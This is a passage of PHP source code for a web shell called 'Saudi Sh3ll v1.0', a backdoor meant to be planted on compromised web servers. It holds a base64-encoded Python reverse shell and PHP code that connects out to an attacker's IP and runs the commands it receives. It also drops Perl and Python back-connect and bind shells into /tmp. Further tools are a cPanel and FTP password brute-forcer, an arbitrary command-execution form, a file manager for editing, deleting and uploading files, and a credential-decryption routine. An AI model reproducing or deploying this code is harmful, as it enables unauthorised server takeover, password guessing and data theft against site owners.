  2590. $back_py = "IyEvdXNyL2Jpbi9lbnYgcHl0aG9uIC11DQoNCmltcG9ydCBzeXMsIHNvY2tldCwgb3MNCg0KaWYgbGVuKHN5cy5hcmd2KSAhPSAzOg0KIHByaW50ICJbeF0gVXNvOiAlcyBbaG9zdF0gW3BvcnRdIiAlIChzeXMuYXJndlswXSkNCmVsc2U6DQogaG9zdCA9IHN0cihzeXMuYXJndlsxXSkNCiBwb3J0ID0gaW50KHN5cy5hcmd2WzJdKQ0KIGhhbmRsZXIgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQogdHJ5Og0KICB0cnk6DQogICBpZiBvcy5mb3JrKCkgPiAwOiBvcy5fZXhpdCgwKQ0KICBleGNlcHQgT1NFcnJvciwgZXJyb3I6DQogICBwcmludCAnRXJyb3IgRW4gRm9yazogJWQgKCVzKScgJSAoZXJyb3IuZXJybm8sIGVycm9yLnN0cmVycm9yKQ0KICAgcGlkID0gb3MuZm9yaygpDQogICBpZiBwaWQgPiAwOg0KICAgIHByaW50ICdGb3JrIE5vIFZhbGlkbyEnDQogIGhhbmRsZXIuY29ubmVjdCgoaG9zdCwgcG9ydCkpDQogIG9zLmR1cDIoaGFuZGxlci5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0KICBvcy5kdXAyKGhhbmRsZXIuZmlsZW5vKCksIHN5cy5zdGRvdXQuZmlsZW5vKCkpDQogIHdoaWxlIGhhbmRsZXIucmVjdjoNCiAgIGhhbmRsZXIuc2VuZGFsbCgoJ1xuW1NhdWRpIFNoM2xsXSM+JykpDQogICBvcy5zeXN0ZW0oJy9iaW4vYmFzaCcpDQogZXhjZXB0Og0KICBwcmludCAiWyFdIEVycm9yIGNvbm5lY3Rpb24i";
  2591.  
  2592. ////////////////////////// php ///////////////////////
  2593. if ($op == 'php')
  2594. {
  2595.  
  2596. $sockfd=fsockopen($ip , $port , $errno, $errstr );
  2597.  
  2598.  if($errno != 0)
  2599.         {
  2600.             echo "$errno : $errstr";
  2601.         }
  2602.         else if (!$sockfd)
  2603.         {
  2604.                $result = "error connect!</p>";
  2605.         }
  2606.         else
  2607.         {
  2608.             fputs ($sockfd ,
  2609.             "
  2610. /################################\
  2611. #                                #
  2612. #      Saudi Sh3ll v1.0          #
  2613. #                                #
  2614. #        by al-swisre            #
  2615. #                                #
  2616. \################################/");
  2617.          $pwd = shell_exec("pwd");
  2618.          $sysinfo = shell_exec("uname -a");
  2619.          $id = shell_exec("id");
  2620.          $len = 1337;
  2621.          fputs($sockfd ,$sysinfo . "\n" );
  2622.          fputs($sockfd ,$pwd . "\n" );
  2623.          fputs($sockfd ,$id ."\n\n" );
  2624.          while(!feof($sockfd))
  2625.          {
  2626.             $cmdPrompt ="(Saudi sh3ll)[$]> ";
  2627.             fputs ($sockfd , $cmdPrompt );
  2628.             $command= fgets($sockfd, $len);
  2629.             fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
  2630.          }
  2631.          fclose($sockfd);
  2632.         }
  2633.  
  2634. echo "End Connect";
  2635. exit;
  2636. }
  2637.  
  2638.  
  2639.  
  2640.  
  2641. elseif ($op == 'perl')
  2642. {
  2643.  
  2644.  
  2645. op_sa("/tmp/sa.pl",$back_perl);
  2646.                         $out = cmd("perl /tmp/sa.pl ".$ip." ".$port." 1>/dev/null 2>&1 &");
  2647.             sleep(1);
  2648.                         echo "<pre>$out\n".cmd("ps aux | grep sa.pl")."</pre>";
  2649.             unlink("/tmp/sa.pl");
  2650.  
  2651.  
  2652.  
  2653. }
  2654.  
  2655.  
  2656.  
  2657. elseif ($op == 'python')
  2658. {
  2659.  
  2660.  
  2661. op_sa("/tmp/sa.py",$back_py);
  2662.                         $out = cmd("python /tmp/sa.py ".$ip." ".$port." 1>/dev/null 2>&1 &");
  2663.             sleep(1);
  2664.                         echo "<pre>$out\n".cmd("ps aux | grep sa.py")."</pre>";
  2665.  
  2666.  
  2667.  
  2668.  
  2669. }
  2670.  
  2671. }
  2672. else if ($_POST['con'] == 'Connect bind'){
  2673. /////////////////////// bind /////////////////////
  2674.  
  2675. if ($op == 'perl')
  2676. {
  2677.  
  2678.  
  2679.  
  2680. $bind_port = $_POST['bind_port'];
  2681.  
  2682. op_sa("/tmp/sa.pl",$bind_perl);
  2683.                         $out = cmd("perl /tmp/sa.pl ".$bind_port." 1>/dev/null 2>&1 &");
  2684.             sleep(1);
  2685.                         echo "<pre>$out\n".cmd("ps aux | grep sa.pl")."</pre>";
  2686.             unlink("/tmp/sa.pl");
  2687.  
  2688.  
  2689.  
  2690. }
  2691.  
  2692. else if ($op == 'python')
  2693. {
  2694.  
  2695.  
  2696. $bind_port = $_POST['bind_port'];
  2697.  
  2698. op_sa("/tmp/sa.py",$bind_py);
  2699.                         $out = cmd("python /tmp/sa.py ".$bind_port." 1>/dev/null 2>&1 &");
  2700.             sleep(1);
  2701.                         echo "<pre>$out\n".cmd("ps aux | grep sa.py")."</pre>";
  2702.             unlink("/tmp/sa.py");
  2703.  
  2704.  
  2705.  
  2706.  
  2707.  
  2708.  
  2709. }
  2710.  
  2711.  
  2712.  
  2713.  
  2714.  
  2715.  
  2716. }}
  2717.  
  2718.  
  2719.  
  2720.  
  2721.  
  2722. break;
  2723.  
  2724. ////////////////////////////////////////// BruteForce  /////////////////////
  2725.  
  2726. case 'brt':
  2727.  
  2728. echo "<br /><br /><div class='cont3'><a href='$pg?sws=brt'>[ BruteForce ]</a></div><br />";
  2729.  
  2730.  
  2731.  
  2732. if (!isset($_POST['bru']))
  2733. {
  2734.  
  2735. echo '<form method="post">
  2736.  
  2737. <textarea name="user" cols="30" rows="15">userlist</textarea>
  2738. <textarea name="pass" cols="30" rows="15">passlist</textarea><br /><br />
  2739. target : <input type="text" name="trg" value="localhost" />&nbsp;&nbsp;&nbsp;
  2740. <select name="op">
  2741. <option value="cpanel">cpanel</option>
  2742. <option value="ftp">ftp</option>
  2743. </select><br /> <br />
  2744. <input type="submit" name="bru" value="brute" />
  2745. </form>';
  2746.  
  2747. exit;
  2748. }else
  2749. {
  2750.  
  2751. $users = $_POST['user'];
  2752. $pass = $_POST['pass'];
  2753. $option = $_POST['op'];
  2754. $connect_timeout=5;
  2755. @ini_set('memory_limit', 1000000000000);
  2756. $target = $_POST['trg'];
  2757. @set_time_limit(0);
  2758.  
  2759. $userlist = explode ("\n" , $users );
  2760. $passlist = explode ("\n" , $pass );
  2761.  
  2762. foreach ($userlist as $user) {
  2763. $_user = trim($user);
  2764. foreach ($passlist as $password ) {
  2765. $_pass = trim($password);
  2766. if($option == "ftp"){
  2767. ftp_check($target,$_user,$_pass,$connect_timeout);
  2768. }
  2769. if ($option == "cpanel")
  2770. {
  2771. cpanel_check($target,$_user,$_pass,$connect_timeout);
  2772. }
  2773. }
  2774. }
  2775.  
  2776.  
  2777.  
  2778.  
  2779. }
  2780.  
  2781.  
  2782.  
  2783.  
  2784.  
  2785.  
  2786. break;
  2787.  
  2788.  
  2789. ///////////////////////////////////////////////////// about ///////////////////////////////////////////
  2790. case 'ab':
  2791.  
  2792. echo '<div class="hedr"> <img src="http://im15.gulfup.com/2012-02-03/1328281037731.png" alt="Saudi Shell" > </div><br /> ';
  2793. echo "<div class='ab'><table cellpadding='5'  align='center'>";
  2794. echo "<tr><td><b>Coded By :</b> al-swisre</td></tr>";
  2795. echo "<tr><td><b>E-mail :</b> oy3@hotmail.com</td></tr>";
  2796. echo "<tr><td><b>From :</b> Saudi Arabian</td></tr>";
  2797. echo "<tr><td><b>Age :</b> 2/1995</td></tr>";
  2798. echo "<tr><td><b>twitter :</b> <a  target='_blank'href='https://twitter.com/#!/al_swisre'>al_swisre</a></td></tr>";
  2799. echo "<tr><td><b>S.Greetz 2 :</b> Mr.Alsa3ek - Ejram Hacker</td></tr>";
  2800. echo "<tr><td><b>Greetz 2 :</b> e.V.E.L - G-B - kinG oF coNTrol - w0LF Gh4m3D - iNjeCt - abu halil 501 -  Mr.Pixy </td></tr><tr><td><b>And :</b> Mr.Black  - IraQiaN-r0x - Oxygen - locked - n4ss  .. and  All members of v4-team.com </td></tr></div>";
  2801.  
  2802. exit;
  2803. break;
  2804.  
  2805.  
  2806.  
  2807.  
  2808.  
  2809.  
  2810.  
  2811.  
  2812.  
  2813. }
  2814.  
  2815.  
  2816.  
  2817.  
  2818.  
  2819.  
  2820.  
  2821.  
  2822. }
  2823. else
  2824. {
  2825. /////////// File Manager //////////////
  2826.  
  2827. $sws = 'al-swisre' ;
  2828. if ($sws != 'al-swisre'){echo "Coded by al-swisre"; exit;}
  2829.  
  2830. if(@$_GET['dir']){
  2831.     $dir = $_GET['dir'];
  2832.     if($dir != 'nullz') $dir = @cleandir($dir);
  2833. }
  2834.  
  2835. $curdir = @cleandir(@getcwd());
  2836. $self = $_SERVER['PHP_SELF'];
  2837. $me = $_SERVER['PHP_SELF'];
  2838.  
  2839. if($dir=="") $dir = $curdir;
  2840.     $dirx = explode(DIRECTORY_SEPARATOR, $dir);
  2841.     $files = array();
  2842.     $folders = array();
  2843.     echo"<br /><div class='t33p'><table cellpadding='0' align='center' width='100%' >";
  2844.     echo"<tr><td style=\"text-align: left\" >";
  2845.     echo" Your path : &nbsp;";
  2846.     for($i=0;$i<count($dirx);$i++){
  2847.         @$totalpath .= $dirx[$i] . DIRECTORY_SEPARATOR;
  2848.         echo("<a href='" . $me . "?dir=$totalpath" . "'>$dirx[$i]</a>" . DIRECTORY_SEPARATOR);
  2849.     }
  2850.     echo "<td></tr></table></div><br />";
  2851.     echo"<div class='t3p'><table cellpadding='0' align='center' width='100%' >";
  2852.     echo"<tr><td>Name</td><td>Size</td><td>Modify</td><td>Owner/Group</td><td>Permissions</td><td>Option<td></td></tr>";
  2853.     if ($handle = @opendir($dir)) {
  2854.         while (false != ($link = readdir($handle))) {
  2855.                $on3 = @posix_getpwuid(@fileowner($dir."/".$link)) ;
  2856.                $gr = @posix_getgrgid(@filegroup($dir."/".$link));
  2857.             if (@is_dir($dir . DIRECTORY_SEPARATOR . $link)){
  2858.                 $file = array();
  2859.                 @$file['link'] = "<a href='$me?dir=$dir" . DIRECTORY_SEPARATOR . "$link'>[ $link ]</font></a>";
  2860.                 $file['pir'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@wsoPermsColor($dir."/".$link)."</a>";
  2861.                 $file['pir2'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@perm($dir."/".$link)."</a>";
  2862.  
  2863.                 $folder = "<tr><td> ".$file['link']."</td><td>dir</td><td>".date('Y-m-d H:i:s', @filemtime($dir."/".$link))."</td><td>".$on3['name']."/".$gr['name']."</td><td>".$file['pir']."&nbsp;&nbsp;&nbsp;".$file['pir2']."<td><a href='?sws=rname&file=$link&dir=$dir'\">R</a> - <a href='?sws=chmod&file=$link&dir=$dir'\">C</a> - <a href='?sws=rm&file=$link&dir=$dir'\">rm</a></td></td></tr></div>" ;
  2864.  
  2865.                 array_push($folders, $folder);
  2866.             }
  2867.             else{
  2868.                 $file = array();
  2869.                 $ext = @strpos($link, ".") ? @strtolower(end(explode(".", $link))) : "";
  2870.                  $file['pir'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@wsoPermsColor($dir."/".$link)."</a>";
  2871.                  $file['pir2'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@perm($dir."/".$link)."</a>";
  2872.                  $file['size'] = @number_format(@filesize($dir."/".$link)/1024,2);
  2873.                    @$file['link'] = "<a href='?sws=edit&file=$link&dir=$dir'\">".$link ."</a>";
  2874.                  $file = "<tr><td>".$file['link']."</td><td>".$file['size']."</td><td>".date('Y-m-d H:i:s', @filemtime($dir."/".$link))."</td><td>".$on3['name']."/".$gr['name']."</td><td>".$file['pir']."&nbsp;&nbsp;&nbsp;".$file['pir2']."<td><a href='?sws=edit&file=$link&dir=$dir'\">E</a> - <a href='?sws=rname&file=$link&dir=$dir'\">R</a> - <a href='?sws=chmod&file=$link&dir=$dir'\">C</a> - <a href='?sws=dow&file=$link&dir=$dir'\">D</a> - <a href='?sws=rm&file=$link&dir=$dir'\">rm</a></td></td></tr></div>" ;
  2875.                 array_push($files, $file);
  2876.             }
  2877.  
  2878.         }
  2879.          asort($folders);
  2880.          asort($files);
  2881.  
  2882.         foreach($folders as $folder) echo $folder;
  2883.        foreach($files as $file) echo $file;
  2884.         echo "</table></div>" ;
  2885.         closedir($handle);
  2886.  
  2887.  
  2888. }
  2889.  
  2890.  
  2891.  
  2892.  
  2893.  
  2894.  
  2895.  
  2896.  
  2897.  
  2898.  
  2899.  
  2900.  
  2901.  
  2902.  
  2903. }
  2904.  
  2905.  
  2906. if ($_GET['sws'] == 'rname')
  2907. {
  2908.  
  2909. $dir = $_GET['dir'];
  2910.  
  2911. $file = $_GET['file'];
  2912.  
  2913. if (!isset($file) or !isset ($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
  2914.  
  2915. if (!isset($_POST['edit']))
  2916. {
  2917.  
  2918. echo "<br />
  2919. <div class=\"cont3\">  <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
  2920. <a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div><br />
  2921. dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
  2922. <form method='post'>
  2923. new name : <input type='text' value='$file' name='name'  /><br /><br />
  2924. <input type='submit' value='edit' name='edit' />
  2925.  
  2926. </form>
  2927.  
  2928.  ";
  2929. }else
  2930. {
  2931.  
  2932. $new = $_POST['name'];
  2933.  
  2934. $rn = @rename ($dir."/".$file,$dir."/".$new);
  2935.  
  2936. if(!$rn)
  2937. {
  2938.  
  2939.  
  2940. @cmd("cd $dir;mv $file $new ");
  2941.  
  2942.  
  2943. }else
  2944. {
  2945.  
  2946. echo "<br /><br />Name change successfully";
  2947.  
  2948. echo "<br /><br /><a href='?sws=rname&file=$new&dir=$dir'\">[ Back ]</a>";
  2949.  
  2950. }
  2951.  
  2952.  
  2953.  
  2954. }
  2955. }
  2956.  
  2957.  
  2958.  
  2959.  
  2960.  
  2961. if ($_GET['sws'] == 'chmod')
  2962. {
  2963.  
  2964. $dir = $_GET['dir'];
  2965.  
  2966. $file = $_GET['file'];
  2967.  
  2968. if (!isset($file) or !isset($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
  2969.  
  2970. if (!isset($_POST['edit']))
  2971. {
  2972.  
  2973. echo "<br />
  2974. <div class=\"cont3\">  <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
  2975. <a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div><br />
  2976. dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
  2977. <form method='post'>
  2978. File to chmod: <input type='text' value=".$dir."/".$file." name='file' />&nbsp;&nbsp;&nbsp;<select name=\"ch\">
  2979. <option value=\"755\">755</option>
  2980. <option value=\"777\">777</option>
  2981. <option value=\"644\">644</option>
  2982. </select>
  2983. <br /><br /><input type='submit' value='chmod' name='edit' />
  2984.  
  2985. </form>
  2986.  
  2987.  ";
  2988. }
  2989. else
  2990. {
  2991.  
  2992. $pir = $_POST['ch'];
  2993.  
  2994. if ($pir == '755'
  2995. )
  2996.  
  2997. {
  2998.    $cd = @chmod($_POST['file'],0775);
  2999. }
  3000. elseif ($pir == '777')
  3001.        {
  3002.    $cd = @chmod($_POST['file'],0777);
  3003.  
  3004.        }
  3005. elseif ($pir == '644')
  3006. {
  3007.  
  3008. $cd = $cd = @chmod($_POST['file'],0644);
  3009.  
  3010. }
  3011.  
  3012. if(!$cd)
  3013. {
  3014. echo "ERROR";
  3015.  
  3016. }else
  3017. {
  3018.  
  3019. echo "changed Successfully";
  3020. echo "<br /><br /><a href='?sws=chmod&file=$file&dir=$dir'\">[ Back ]</a>";
  3021.  
  3022.  
  3023. }
  3024.  
  3025. }
  3026. }
  3027.  
  3028. if ($_GET['sws'] == 'edit')
  3029. {
  3030.  
  3031. $file = $_GET['file'];
  3032. $dir = $_GET['dir'];
  3033.  
  3034. if (!isset($file) or !isset($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
  3035.  
  3036. if (!isset($_POST['ed']))
  3037. {
  3038.  
  3039. $fil33 = @fopen($dir."/".$file, 'r');
  3040. $content = @fread($fil33, @filesize($dir."/".$file));
  3041.  
  3042. echo "
  3043. <div class=\"cont3\">  <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
  3044. <a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div>
  3045. <br />
  3046. dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
  3047. <form method=\"post\">
  3048. <br /><textarea cols=\"85\" rows=\"25\" name=\"fil3\">";
  3049. echo htmlentities($content) . "\n";
  3050. echo '
  3051. </textarea>
  3052. <br /><br />
  3053. <input type="submit" name="ed" value="Save !"/>
  3054. </form>
  3055.  
  3056. ';
  3057.  
  3058. }
  3059. else
  3060. {
  3061.  
  3062.  
  3063. $oo = @fopen($dir."/".$file, 'w');
  3064.       $ow =   @fwrite($oo, @stripslashes($_POST['fil3']));
  3065.         @fclose($oo);
  3066.         if (!$ow){echo "Error";}else {
  3067.           echo header("Location: ?sws=edit&file=$file&dir=$dir");
  3068.           }
  3069.  
  3070.  
  3071.  
  3072.  
  3073.  
  3074. }
  3075.  
  3076.  
  3077.  
  3078.  
  3079. }
  3080. else if ($_GET['sws'] == 'dow')
  3081. {
  3082. $file = $_GET['file'];
  3083. $dir = $_GET['dir'];
  3084.  
  3085. @sa_download ($dir."/".$file);
  3086.  
  3087.  
  3088. }
  3089. /////////////////////////////////////////////////////
  3090. if ($_GET['sws'] == 'rm')
  3091. {
  3092.  
  3093. $dir = $_GET['dir'];
  3094.  
  3095. $file = $_GET['file'];
  3096.  
  3097. if (!isset($file) or !isset ($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
  3098.  
  3099. if (!isset($_POST['edit']))
  3100. {
  3101.  
  3102. echo "<br />
  3103. <div class=\"cont3\">  <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
  3104. <a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div>
  3105. <br />
  3106. dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />
  3107. <form method='post'>
  3108. <input type='submit' value='Delete' name='edit' />
  3109.  
  3110. </form>
  3111.  
  3112.  ";
  3113. }else
  3114. {
  3115.  
  3116.  
  3117. $rn = @unlink ($dir."/".$file);
  3118.  
  3119. if(!$rn)
  3120. {
  3121.  
  3122.  
  3123. $rn = @rmdir ($dir."/".$file);
  3124.  
  3125.  
  3126.  
  3127. }elseif (!$rn)
  3128. {
  3129.  $rn =  @cmd("cd $dir;rm $file");
  3130.  
  3131. }
  3132. else if (!$rn){@cmd ("cd $dir;rm -r $file");}
  3133. else{
  3134.  
  3135. echo header("Location: $pg?dir=$dir");
  3136. }
  3137.  
  3138. echo header("Location: $pg?dir=$dir");
  3139.  
  3140. }
  3141. }
  3142. ///////////////////////////////////////////////////////////////////////////////// mkdir //////////////////////////////
  3143.  
  3144. else if ($_GET['sws'] == 'mkdir')
  3145. {
  3146.  
  3147.  
  3148. $dir = $_POST['dir'];
  3149. $file = $_POST['n4me'];
  3150.  
  3151. $mkdir = @mkdir ($dir."/".$file,0755);
  3152.  
  3153. if (!$mkdir){@cmd ("mkdir $dir/$file ");}else {header("Location: $pg?dir=$dir"); }
  3154. header("Location: $pg?dir=$dir");
  3155.  
  3156. }
  3157.  
  3158.  
  3159. else if ($_GET['sws'] == 'mkfile')
  3160. {
  3161.  
  3162. $dir = $_POST['dir'];
  3163. $file = $_POST['n4me'];
  3164.  
  3165.  
  3166. $mkdir = @fopen($dir."/".$file,'w');
  3167.  
  3168. if (!$mkdir){@cmd ("touch $dir/$file ");}else {header("Location: $pg?dir=$dir"); }
  3169.  
  3170.  
  3171. }
  3172.  
  3173. else if ($_GET['sws'] == 'up')
  3174. {
  3175.  
  3176.  
  3177. $dir = $_POST['dir'];
  3178.  
  3179.  
  3180. if(@move_uploaded_file($_FILES['upfile']['tmp_name'], $dir."/".$_FILES['upfile']['name'])) { header("Location: $pg?dir=$dir"); }
  3181.         else { echo '<br /><br />Not uploaded !!<br><br>';exit; }
  3182.  
  3183. }
  3184.  
  3185.  
  3186. //////////////////////////// read file /////////////////////
  3187.  
  3188. else if ($_GET['sws'] == 'rfile')
  3189. {
  3190.  
  3191.  
  3192.  
  3193. $file = $_POST['n4me'];
  3194.  
  3195. echo "dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']."  <br /> <br />  ";
  3196.  
  3197. if (!isset($file)){$file = $_GET['dir']."/".$_GET['file'];}
  3198.  
  3199. echo "<div>";
  3200.  
  3201. $r3ad = @fopen($file, 'r');
  3202. if ($r3ad){
  3203. $content = @fread($r3ad, @filesize($file));
  3204. echo "<pre>".htmlentities($content)."</pre>";
  3205. }
  3206. else if (!$r3ad)
  3207. {
  3208. echo "<pre>";
  3209. $r3ad = @show_source($file) ;
  3210. echo "</pre>";
  3211. }
  3212. else if (!$r3ad)
  3213. {
  3214. echo "<pre>";
  3215. $r3ad = @highlight_file($file);
  3216. echo "</pre>";
  3217. }
  3218. else if (!$r3ad)
  3219. {
  3220. echo "<pre>";
  3221. $sm = @symlink($file,'sym.txt');
  3222.  
  3223.  
  3224. if ($sm){
  3225. $r3ad = @fopen('sym.txt', 'r');
  3226. $content = @fread($r3ad, @filesize($dir."/".$file));
  3227. echo "<pre>".htmlentities($content)."</pre>";
  3228. }
  3229. }
  3230.  
  3231. echo "</div>";
  3232.  
  3233. //////////////////////// cmd /////////////////////////////////
  3234.  
  3235.  
  3236. }else if ($_GET['sws'] == 'cmd')
  3237. {
  3238. $cmd = $_POST['n4me'];
  3239. $dir = $_POST['dir'];
  3240.  
  3241. if (isset($cmd))
  3242. {
  3243.  
  3244.  
  3245. echo "<br /><textarea cols='65' rows='25' name='fil3'> ";
  3246.  
  3247. echo @cmd("cd $dir;$cmd") ;
  3248.  
  3249. echo " </textarea>";
  3250.  
  3251.  
  3252.  
  3253. }
  3254.  
  3255.  
  3256.  
  3257.  
  3258. }
  3259. else if ($_GET['sws'] == 'site')
  3260. {
  3261.  
  3262.  
  3263.  
  3264.  
  3265. $read = @file_get_contents("http://networktools.nl/reverseip/$ips") ;
  3266.  
  3267. $sit3 = @findit($read,"<pre>","</pre>");
  3268.  
  3269. echo "<br /><div class='site'><pre> ";
  3270.  
  3271.  
  3272. echo $sit3;
  3273.  
  3274. echo "</pre> </div>";
  3275.  
  3276. exit;
  3277.  
  3278.  
  3279. }
  3280.  
  3281.  
  3282.  
  3283.  
  3284.  
  3285.  
  3286.  
  3287.  
  3288.  
  3289.  
  3290. if(@$_GET['dir']){
  3291.     $dir = $_GET['dir'];
  3292.     if($dir != 'nullz') $dir = cleandir($dir);
  3293. }
  3294.  
  3295. echo "
  3296.  
  3297. <br /><br />
  3298. </div><div class='d0n'>
  3299. <br /><br />
  3300. <table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" width=\"80%\"   >
  3301.  
  3302. <tr><td><form method='GET''>
  3303. Change dir : <br />
  3304. <input type='text' name='name' value='$dir' size='25' />
  3305. <input type='hidden'  name='dir' value='$dir' />
  3306.  
  3307. <input type='submit' value='Go' />
  3308. </form> </td>
  3309.  
  3310. <td style=\"float: left\">  <form method='POST' action='$pg?sws=mkdir' >
  3311.  
  3312. Make dir :<br />
  3313. <input type='text' name='n4me' size='25' />
  3314. <input type='hidden'  name='dir' value='$dir' />
  3315. <input type='submit' value='Go' /></div>
  3316. </form></td></tr>
  3317.  
  3318.  
  3319. <tr><td><form method='post' action='$pg?sws=rfile'>
  3320. read file : <br />
  3321. <input type='text' name='n4me' size='25' />
  3322. <input type='hidden'  name='dir' value='$dir' />
  3323. <input type='submit' value='Go' />
  3324. </form> </td>
  3325.  
  3326.  
  3327. <td style=\"float: left\">  <form method='post'  action='$pg?sws=mkfile' >
  3328.  
  3329. Make file :<br />
  3330. <div style=\"text-align: right\">
  3331. <input type='text' name='n4me' size='25' />
  3332. <input type='hidden'  name='dir' value='$dir' />
  3333. <input type='submit' value='Go' /></div>
  3334. </form></td></tr>
  3335.  
  3336.  
  3337. <tr><td><form method='POST' action='$pg?sws=cmd'>
  3338. Execute : <br />
  3339. <input type='text' name='n4me' size='25' />
  3340. <input type='hidden'  name='dir' value='$dir' />
  3341. <input type='submit' value='Go' />
  3342. </form> </td>
  3343. <b></b>
  3344.  
  3345.  
  3346. <td style=\"float: left\">
  3347. <form method='POST' enctype=\"multipart/form-data\" action='$pg?sws=up' >
  3348. Upload file :<br />
  3349. <div style=\"text-align: right\">
  3350. <input type='file' name='upfile' value='Choose file' size='21' />
  3351. <input type='hidden'  name='dir' value='$dir' />
  3352. <input type='submit' value='Up' />
  3353. </form></td></tr>
  3354.  
  3355.  
  3356.  
  3357. </table>
  3358.  </div>
  3359. ";
  3360. //////////////////////////////////////// exit :d //////////////////////////
  3361.  
  3362.  
  3363.  
  3364.  
  3365.  
  3366.  
  3367.  
  3368.  
  3369.  
  3370.  
  3371.  
  3372.  
  3373.  
  3374.  
  3375.  
  3376.  
  3377.  
  3378.  
  3379.  
  3380.  
  3381.  
  3382.  
  3383.  
  3384. function cmd($cfe)
  3385. {
  3386.  $res = '';
  3387.  if (!empty($cfe))
  3388.  {
  3389.   if(function_exists('exec'))
  3390.    {
  3391.     @exec($cfe,$res);
  3392.     $res = join("\n",$res);
  3393.    }
  3394.   elseif(function_exists('shell_exec'))
  3395.    {
  3396.     $res = @shell_exec($cfe);
  3397.    }
  3398.   elseif(function_exists('system'))
  3399.    {
  3400.     @ob_start();
  3401.     @system($cfe);
  3402.     $res = @ob_get_contents();
  3403.     @ob_end_clean();
  3404.    }
  3405.   elseif(function_exists('passthru'))
  3406.    {
  3407.     @ob_start();
  3408.     @passthru($cfe);
  3409.     $res = @ob_get_contents();
  3410.     @ob_end_clean();
  3411.    }
  3412.   elseif(@is_resource($f = @popen($cfe,"r")))
  3413.   {
  3414.    $res = "";
  3415.    while(!@feof($f)) { $res .= @fread($f,1024); }
  3416.    @pclose($f);
  3417.   }
  3418.  }
  3419.  return $res;
  3420. }
  3421.  
  3422. function sa($i)
  3423. {
  3424. return @str_repeat("&nbsp;",$i);
  3425. }
  3426.  
  3427.  
  3428.  
  3429. function decrypt ($string,$cc_encryption_hash)
  3430. {
  3431.     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  3432.     $hash_key = _hash ($key);
  3433.     $hash_length = strlen ($hash_key);
  3434.     $string = base64_decode ($string);
  3435.     $tmp_iv = substr ($string, 0, $hash_length);
  3436.     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  3437.     $iv = $out = '';
  3438.     $c = 0;
  3439.     while ($c < $hash_length)
  3440.     {
  3441.         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  3442.         ++$c;
  3443.     }
  3444.  
  3445.     $key = $iv;
  3446.     $c = 0;
  3447.     while ($c < strlen ($string))
  3448.     {
  3449.         if (($c != 0 AND $c % $hash_length == 0))
  3450.         {
  3451.             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  3452.         }
  3453.  
  3454.         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  3455.         ++$c;
  3456.     }
  3457.  
  3458.     return $out;
  3459. }
  3460.  
  3461.  
  3462. function _hash ($string)
  3463. {
  3464.     $hash = (function_exists ('sha1')) ? sha1($string):md5($string);
  3465.     $out = '';
  3466.     $c = 0;
  3467.     while ($c < strlen ($hash))
  3468.     {
  3469.         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  3470.         $c += 2;
  3471.     }
  3472.     return $out;
  3473. }
  3474.  
  3475. function backup_tables($path,$host,$user,$pass,$name,$tables = '*')
  3476. {
  3477.  
  3478.   $link = @mysql_connect($host,$user,$pass);
  3479.   @mysql_select_db($name,$link);
  3480.  
  3481.   //get all of the tables
  3482.   if($tables == '*')
  3483.   {
  3484.     $tables = array();
  3485.     $result = @mysql_query('SHOW TABLES');
